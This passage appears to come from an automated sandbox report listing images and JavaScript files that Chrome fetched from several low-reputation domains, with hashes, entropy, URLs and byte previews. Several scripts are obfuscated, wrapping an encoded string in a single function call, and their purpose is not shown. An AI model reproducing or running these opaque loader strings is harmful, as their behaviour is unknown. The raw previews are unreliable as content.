                                                                                                                                                          SHA-256:239AC35D52D5430A3065E556A633813A9259057F7F152377C5D1E840292CF560
                                                                                                                                                          SHA-512:5ADD87FFDF0960DD966329469ADE15152CEAB7446736FB103E9C5C092BF13CD5379CF44899F8F50F9F7BB7CCC03B42D679ECCDBBE6A81BE35E20BE3ADFC73158
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............r......pHYs.................IDATH...]h.W......P.>5B*-b..6.ZL!.m&........y)..Zb,1....-..4..D..A..Yc4.$hI.JJ^.T).}...L..n.v&Lfg6...3......{....T......f..0.j...r.*.).......?TM..?......2S....#pr.@...>.N..2R;be.V...'@...g.Tr.pb...C{h..1.#...z .}.....e...*1R.@.....^".....Tr...L`..H%w..w.L..)..8.$..@|..w.`....[.fU..UM......#..@...TM......<k.>TM..lS5.{U......@LJ....A.p...z.R:sa@...mg)..5^.oI......Z.h.mJ"|......:"..6e}.v....)....!5..I._`eHC...:...].......&...3.{.i._.xo..(.}.Y.7-S..W<u{..E.{,S..hTO3t..C.w-S..4O..F_.{zX.L.-..Mu.N../8......=@..x.@...F..@.>.>b...M.....a..]."...4...w.zb...?+...>...V....V.FJ.9.CJ....O.t2!1.t...rN..9y|.s......4..|".#...x:$F......a..L...~.......=...#.p(......*#..u............%.g....u.L/<1.z.=2.L.%#.B...B9)....#...=2.Z..n.|..E.j,&.....(e.n.S.N_..H`<..@g..7.:..?).B....;..DB..x.........T...M...c,..(..;..\...Xf.=P.0"...".y.w.K....O....&.!....x...h.............?".....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1333
                                                                                                                                                          Entropy (8bit):7.525854715934
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:leE1iEuR3QTVkhxMxUzzO8CKhM1tUYNGrYzPX2YP8TWbFdd3U855e4:AES1IuPCKwtUYNYw18TIFdd3U855F
                                                                                                                                                          MD5:003485B974AACA853F5281CD4B21C5A2
                                                                                                                                                          SHA1:05D49CAB4EB91487597F1D6C261EF86B5E6EC244
                                                                                                                                                          SHA-256:3EBAF1E2AF96D7AB74F83F1075BA6875CFE32BE8809E9405B67EFD6C2FADBE58
                                                                                                                                                          SHA-512:3118ACAB3D915F7577E81DC13A75D6E3BD81A346870C77E1BDB0B62CF2553AAD101F4B8D927B28ACB5241ED4019B76B1EF1A023996F7EE828AFE48B11E5A5381
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...<...+'.<<..8.;;N..<...;;.::.;:...<...<<;...98....;;.98.<<.<<.:;...::=..<...448..<....7...=...<<=...<<..8<......<<<....8.oo?....8.;;.97;...<<..7.<<;....:.@E=.....=....86..;..\w..447..:...<<.Y...7=..;..5...849....4........8.TT.yy....bb....zz.<<..8.<<=...=....8.88.<..=.....=...<<....8.;.<<:...<.KK..8=.......<..E.......8Xx....=......;:.<<....<<....:..8...=...''.5.........8....<<=...::....99..8.......77...........uu.hh.dd.............\\.TT.LL.FF...................zz.``.DD.??...................oo.mm.XX$.&.....tRNS........}O...ti........T>1...................vrnkebZSLEB>76)"!.......................................{ph`_[VUTJB@410//+''$#"...N.T...DIDAT(.m.ew.A..'K....J...]...................].{Ny>.s....3.C_.1..m.Qq..9....:_...m.......2.....V{..y...%9t...-....A.NJ.9...:..NL....Y.8.Tn.35..b.q.fd..O...]_O..j..S.o......z..h.......-...[..gy=Rq....#...}Kn.x.O.V....o...$E...Tk"~N..HYFf.B3Na....."KY+0NN.0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 74 x 69, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7640
                                                                                                                                                          Entropy (8bit):7.967133728246244
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ypW+AGem0rQ9snxmITdQncXBbJRxHG8jHVNV:ypx9oQ9FBcRbJRDj1D
                                                                                                                                                          MD5:606B9BF626C97C6EB460C5D08D16209E
                                                                                                                                                          SHA1:CBE1913E4E23B62C5E8ACA8533971FD892D8195A
                                                                                                                                                          SHA-256:2C7494BD1407CE76AEB47314E5C7DA00C753DADDBE5323D652D62E626FA8E4D3
                                                                                                                                                          SHA-512:6CE822E6567A2FF284FF727EE079C0BA6734F1DA5A67F525878FB884281FDA6E44E40A8FA4922F3A60EF1D2CE595A1C8ED0EDD1211EF0BE5AD73709F67ACB66A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/service/pb_icon.png
                                                                                                                                                          Preview:.PNG........IHDR...J...E......p.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx..{.eUu.{.}.}VUW7....@.:.G..M..D.....`...P#...6..'Q.O.1>..(b#.C^F%.HL$..I.!.. .~W.}...Z..9....h....w}vWw.....k..[..v;..M..M.........{...$z.........?..!.{`a.)....Z..(...Gq.5.k6. o.........9{.s.d.I.....F.O.......\c0.M`+.z4......_..e.,...=..a..U\...y.9....z.....L....G.I....4;...i...)FT....F ........o......B^..Q.+.o.D...n.l.............7."R.f...}....C>.....hZ....s..........0e.c........ys....Ci..Y...|..^H.A\..%...@9a.eG,..To8g.d?.F...c^..G.w....u..,.........o.r. .c......(....r..}..R..j.-.........a.....;...n..voP...{.V.Y.m..=:S|........o...:...U.....S.8.....~bb..z....c.u...hd..t]R.<..h<jS|..x.......4..GF..:.H........X..$p..N,..i....P&..o.r.G.5.?.@...q.S,....]..='.O..o.)_.4..!V@.A.P.x'N...1P..9pc.V^E....8..-,....]..6Z.$!K..B4._...8. U.M.....b.:...$A.....c...Z........yA.P.c!....u.>.E....2\...mF.PW.j..c....~j.V....0x..W.KQ.7.fB. *.p..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):288
                                                                                                                                                          Entropy (8bit):5.563542959321068
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:4DAIUahFBkbyKcUdftUDbgJ9xJVIfbdNfVEJFkeEbqo2C8sWs:4chWFBk+K7ggqfDfVEJlEOolH
                                                                                                                                                          MD5:A2AFAF7776856C25AFC291751F5E298B
                                                                                                                                                          SHA1:A9360D174F78782FD21AF46F64167B36EB6A8337
                                                                                                                                                          SHA-256:5016F63C0ADBC369EAD98100633CD34D3BAE53226D4050F2A4A7B03EAF8BBE6B
                                                                                                                                                          SHA-512:DCC6235FD46EF1C43E7E1F476A07EBA1E0927370D0F9511A54D5EE773C5724BB38408BD7A21D8ADECF2C30041BF1F63613403CEDE3BF107E406593F51715B974
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4044-news-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtA7AFgCYBdAGgG8AiARgGkYVKAuAMwFc0YAXAS3UxCkupNAEoqbJCAAESLgCce3SgG4A8mABWIbgDoAJiBY80IAAryUEEPK4BPTMMoB9ZyCQBZFPrYAbEJQUAG5QvmwgTACEAAwAvqIiBo6klKbASIHsnLz84vIgXGzyaNI88Soh8qUAvOS8XP5MlIAA5oANpoA2ioBSKk2kALZIAOYAKjwNEZSBSuhN+NSB+jz53HxoTf4sXJSx26IqQA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (57212), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):57212
                                                                                                                                                          Entropy (8bit):5.96791735433038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:bgtq+6jfAEMmU0PGo9KhuiaAc73LtPAFpIwe:7LfhhU1sriaNL5ADi
                                                                                                                                                          MD5:D3C921A5D728B64E494470536D9E16F3
                                                                                                                                                          SHA1:7E54A88B23A6CEF830F88892334037C1C85C4C4F
                                                                                                                                                          SHA-256:BED5E0787FE3F5EB912A33759EB74D06959AAB37C8222F74142C238931871054
                                                                                                                                                          SHA-512:4FF471125C0CF275C0018EBE606A3B51B0DCA718D001D803F5214E2BC40EA0858397D454483CBDCDEE68EE97EBD6E2DFAA90EAA54D890C3242FA1231C5E4EE7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/slides.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMTKsldjsHJxc3D2NNXU5vYE40OJRgaoBlBvc4HpFjFu9ZxUwNbR0twOMtEHZmLTQdW54kUk65A2OkMaXYYU4SGMKGqcRA1CgzAaY285FgMBASCQnDAnFO+QYpkCpCgcTqXHUIAAEiBOGIwuxCXQSfUQHtKFotAckAx2Jg1CzCnsACIoMa8/kCEmc7mE4lQJAAOSg6gAYiMGGgkQ1SBA3uoOVzgAwAOQAHjAzHY7HQOhgDQV41sSFO8AAtHqQOpbDptJwoG6HWAQA10iF9dwHD78oV0pbrdkAHzhr2RpBmgD08ZtaETJoMg3YhoOpotVpzdodWPSLrObrQhZ9foDQZD6UVjZ0MbKtmzSY7A3Ymb7ufziJtjSgeSZJKtKEneSOhRAcQYAGYQGvSBi0OwQFoALIoOEznd7rQhUlxXZiBi2QiBCADWzbrEAUQVIDvIE/L5gDhtABbS8xBvORLDuVo1HIN4Pi+LtMHNEcuwKHsRx9DM8wEao90HfkAGo6CmUh9nFUxmVIpAAGEqx5Z1XTgN1KJfOItCgMQxCgMAGi/IkAQVMDbFOBttBfFcxBAVVVjmBhqjXQhSARE9yMUlB/yQAB5NAjhDEAOBnag1IcLSqLCKA0AkmddmoXZOD3OV+DQOz/QaE54i/YkHWkPIABkUFJO90DhQDzLiF9AJQXEeNVTgtBcGdoCWLSqRQSktAcxLHC09V1IyxEsrQUUxhStKZzeJBhj2AAVFA7x2PYDhf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2756), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2756
                                                                                                                                                          Entropy (8bit):5.896185491872585
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V8dnAImgQA4/4U1HjCiiI8cGsrve2VhY3hmTlDRlm2NdyqbsCafXTcI1FqTrPUim:V8gFWU1H7iI8krSElDRlmgdXbmwI1FsO
                                                                                                                                                          MD5:FAB708A58E7441D050A75FD27FE1C8C0
                                                                                                                                                          SHA1:699B9FB8FA80B435037E81AAC72D4D1FDD5FA1AC
                                                                                                                                                          SHA-256:F1EBDD7CB694B2D01550386A7B274DB6B28C6243D76147723E614C232127617B
                                                                                                                                                          SHA-512:FA8190CB90CA691F52FD11C19E272B9E58C3269414CAFC48E664AB41852D8FC9C52B287E5926CB0B4920A3EFA0277D4181995BC8C12F412EABF4F6AC95F8E042
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/menuSubA.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZkIF0AaAbxQDUBHADQC4AzAVzRgBcBLdTJE9kpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRAAXk5MUQARPQAOYFEhEjQ0nTRMEEKfNIyomAhGApJmatEAOQBNAA9VRqgUzDKhTDIYknUtDkxmHQBbKAgAcRB2dmskIexRTiQAGRQAc2MA0TB0CXMUGe3/Ei2kUwB1USIhQrIICwgkek2kZjBjnNOsdjAZgbc7FYkM8SHooOwoExWBxuIMyHJlsw5GgyD5tuwfqQkAALFDAABCZ2+EVwMVGMEuEGYqz09EGw1G4207Cms3mSxWaw2dz2hzQx1OaHOFiukhB9yeL0KwHhMGJ9DIkull2uSLYXB46zI7GJ2x0804lKlSEwQjpJBmy1Jem+ZCMPlWch2+L1KMNIgx7CxaBkAH4HKakDptqLjAAfOMms3bR5CABkaaTUZJZKtElD3yj7s9mBY+tRvADmOxonJAElWpknOTVK0AKoAZVEERSUZgPigAC9B3FCaN9ssAMID4e+g1lPgCYTo6shnz6QxQXzsHTk0E6ftDwd7tB6Xj8QR2kiSdgPTh6E1zisiTiMCNmoEiRIyFIAEgyADEfxgO4IBSk4ogANRZjowHRnohTsL2OhGKeGSzGBzAALR4rIWG+PQIDUJgURCAUyhFqC6GOlKOH4vhPgFAeSA2qIwD3iaAQ7qhZ6iHiTFIJwg4gLaABUDgoVRfGcIRxGkUx7EPsStqQbgQiQaIEDAnaow3qYKDfGWfpoq+mARDBn5kN+SB/tRmFYXMxgAHx4rJGTQZG0aniAnQaWRiG2aIQH/KB4FQTBcH3vE/5BcBoXMBBHlmpFCHMTauKGASUYoIwjA3raOh+Iw7BYe48LEuaYA2rwOiKSatpYT
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 219 x 79, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13943
                                                                                                                                                          Entropy (8bit):7.96191882198086
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:WQIVS0ih0fVLcbgAtJEN5PYobX/kfEkRMX8:WQES04/M6E/gobX/kskRMX8
                                                                                                                                                          MD5:09D6DEA98A451A5DAA3B1DD00892C887
                                                                                                                                                          SHA1:75E723F320EF1CBE8EA37A7D12A71A4FD8555C08
                                                                                                                                                          SHA-256:ACDD6FB67D7FB349BDFE7E17C35727821A0CF33C05AB05D9B272223549A634E8
                                                                                                                                                          SHA-512:398ACD55744D9FDE87DD7B9F0C8BFB666BE24D01C9BB3BAE367908F9B2EDCA55BA750B92901645B6CC3D77A316B8C54135A904FC567778B7FAD1E9310CD5C4A0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......O.....bt......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:55B437ABF3A011E78EF6FF7F7D365E0C" xmpMM:DocumentID="xmp.did:55B437ACF3A011E78EF6FF7F7D365E0C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:55B437A9F3A011E78EF6FF7F7D365E0C" stRef:documentID="xmp.did:55B437AAF3A011E78EF6FF7F7D365E0C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>2....2.IDATx..}.....;==9m.A..B....(..".@.m~G..9...~....3>.>...6.p.lc.>......,$..W...N.......7.3.+i%$......|..So.U
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 6 x 10, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):213
                                                                                                                                                          Entropy (8bit):6.479893584789263
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:6v/lhPiJtO/6Tx5jb0uMK2ytfYEtzQWxZRXxOqREQTp:6v/7KJtO/6T/j7U6YEtrxZCqR9
                                                                                                                                                          MD5:D234561621A0C14AFE7535FD1963DC85
                                                                                                                                                          SHA1:E0224B5757CEF37B6564D327F544094A471EDEEE
                                                                                                                                                          SHA-256:3A47848A34A63B55E2CA766FA161811C39C5E93CD1C249E2AA4B0621DCA27CA8
                                                                                                                                                          SHA-512:DAFD78E86E9BB1FCE5F4092C56A62AA1A8B1533A0DB2490E29D602D4857D2DF284A6E043C241DC9368249D28BBFD5C0B3E14DC8E42E352C3FFA427ADE95855F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/triangle.png
                                                                                                                                                          Preview:.PNG........IHDR.............../3....pHYs.................IDAT..e.1..P.D...C..,lS.{.Ocn.../....,.}.4..g."?H..if.y,.q..e......XO.V<.a.l.|E..-........>[O.I.+.. J......Q../.ezf.@.+Qvc8..Ju.x....65R4......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1860
                                                                                                                                                          Entropy (8bit):5.845944771947073
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VHQC6JX8y7EBsWWg0fflUGOW69XM3X89UBGPhZC75wCP3g2xHuf6bsWalp:Vw517EBpWgWfKzt1+BAhZC75wXSbsdlp
                                                                                                                                                          MD5:DFD335562D8D028292B8569586AB6902
                                                                                                                                                          SHA1:68EDA38D42D0F4BC5C60AF2C58CC33CD17280B6C
                                                                                                                                                          SHA-256:E95BAB46761928950BD59EBD8FE1C6A3D1FFDE89D2A6D79C730D0C74C5785646
                                                                                                                                                          SHA-512:47C2F125E8C97CE93DE0192641732D38B635B0F36FF2DDFF864DCCF2682FF5DAB27ECF1F7C9944DBA3736C45780A170D6B84ADAFE5953E82CEDB1DDE54BE5BB9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/wrapper.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9dAFsoCABxEA4OGyRh7DEuJABlGyClEEoQNC4QfTFiYULyGBRZiHRTjiQGcjB0SWY2Th4y0TyFYseRoaQcXQgTAARgAzPhcMJdBwABanTAQsAmfR8Py+UhieQAc0IdgKwjGvigdhsP3Y3F4gOBoPBkJhsIALABWJGo9GY7G43z4sQAYQAjgA2ACi5LGsyQRIAQihOnS/ozyECOCCwRCoTlOby0WUBWgcWg8QSOQBqShkm5jUI2DgqtWsen/IZa5l6tkc2Gw4383RY81CkXQ+QAVQA0nLSPc0EF1v83eqGQCfTqWfrMIacsHTaHBZbhQTOgBJaG+BNQNChOxIHYZr1MnN+qFcuFFjEl8NlkVK1qUDkJjgoKByVua7W61kG+G9s0Wq1iACC0eilAThjOFxnWbnubZcKIy/7q/LYjMvkINATvi4KZy0Wih+9x877Ml+AvYavEVxX0aVFkfZ8QFfWo3g9DUj19Bd2QDf9SzXAANXAADUoATVA2H0D923nPM4UlHlkRNPsAIjAlxVaVpOgTCBFAALxAAB1NEQF8Qjs2I09YS5QsKJDajBwJKBRQAejHR1SFMUUFg4GAUSgXiv0Qs8gxE4sxLXIkmDMXYmJRZ4lWxEwiTMKwWAgdSEJI2FJWiFCBzXOgwENR8UCJEwlTsLwsX8eyO00zk/x0qjUOvFiABU6AALVwp5bCVFYQv4qEz3IvldOikVcBoBLazkrhHhQWwzCnJBgAqgjYMzT8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17241
                                                                                                                                                          Entropy (8bit):2.6564108516880913
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:wSiYkEWmfURSBIM+ixNXrNGVmGvsc5ZGPUtU0vGeThlq:wSlk6kM+g5dUtUUJThlq
                                                                                                                                                          MD5:599B2B961205C6D17341FC6D04C94F05
                                                                                                                                                          SHA1:F597C4677D99DE6B79085F5FA245FF210B181DD6
                                                                                                                                                          SHA-256:F5F3A63CFD98BE1B993951A90C4E2E85F69CEF59D88FCF7E30C5B1881D83A2BE
                                                                                                                                                          SHA-512:2267486D65088D81571371CF8492996C3AFFA1043092F2773944358DB412DBED06EA557E51C7D327DE749822DAF629FB3F107C5179D499214C6C913B9427120C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs...............=JiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpRights:Marked>False</xmpRights:Marked>. <xmpMM:OriginalDocumentID>uui
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13569
                                                                                                                                                          Entropy (8bit):7.9542641928161375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:wd2YWEpHwmCOHVTe0wschjx0NQgy3cWShvmHA:wdNF9BCOHVTeDRx0egysXvmg
                                                                                                                                                          MD5:61328DC3D6BBA41D86D4852CDBD80A06
                                                                                                                                                          SHA1:D9FD0CAEDF4CE0B4FD097AEFB3B08FE320F53458
                                                                                                                                                          SHA-256:01160ABD9D13162B1C0E91A286A4A6B3DB263DBFBC96F4A708965DA78C03C471
                                                                                                                                                          SHA-512:ADE51B73B14B4F58240347F36C241418B935E922276ECD1AC059B15FBA73E5CA7A4AB71B9C36DC90A9AADEC46E72AC0E718A770809D3ABB76554D7CA59ADA348
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/pt_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:C17C32078D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:C17C32068D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 36 x 37, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2171
                                                                                                                                                          Entropy (8bit):7.472576952580905
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:4ANn2NHwJ3zrb8hBualjLY9a0vfXPW8w4y4nMrbaZKc:B2BKQBu+jcZ3WOrMrc
                                                                                                                                                          MD5:3567AF78A7204AB3336BD4F4C350599A
                                                                                                                                                          SHA1:A6A695FC7163DBAF9DCD26A80F617042F349F874
                                                                                                                                                          SHA-256:B1E425C2289EFC7830AA846007F64AFD240CF4DC3878FB454A6D048EA6CC2448
                                                                                                                                                          SHA-512:AAE5993C6156C7BFE0E47BC2B0BFBF332E41FACB70DDB41E09B1249E31870ED4C0D0D52CD7523720FCCF1911C66D0E68FE3E40D13027A23D2E151B6E47B2A48C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/footer/icon1.png
                                                                                                                                                          Preview:.PNG........IHDR...$...%......>.j....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:47EE6A9C50A511E786699F4B35C52EE7" xmpMM:DocumentID="xmp.did:47EE6A9D50A511E786699F4B35C52EE7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:47EE6A9A50A511E786699F4B35C52EE7" stRef:documentID="xmp.did:47EE6A9B50A511E786699F4B35C52EE7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx.W.S.u...P.'..."....{j..j...u....?...nj....i.i.h..i..m.v.Js.U...\.EX.3r.9...'>.O......<.....RU5\JY.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):900
                                                                                                                                                          Entropy (8bit):7.519827107138813
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7ElY2dUGYNXupLGzA83vM68SMYeWyvOcCVxZ4d8sC8WOZW7N2BTRztJgvB+OV:/TYtupaV/MEyvBG6VC8WTqdE4OV
                                                                                                                                                          MD5:58C734EFD002186293C67F2A3DDBACC9
                                                                                                                                                          SHA1:15DCCC7A1ADCE147C989AC1DDE0288EAC84E5603
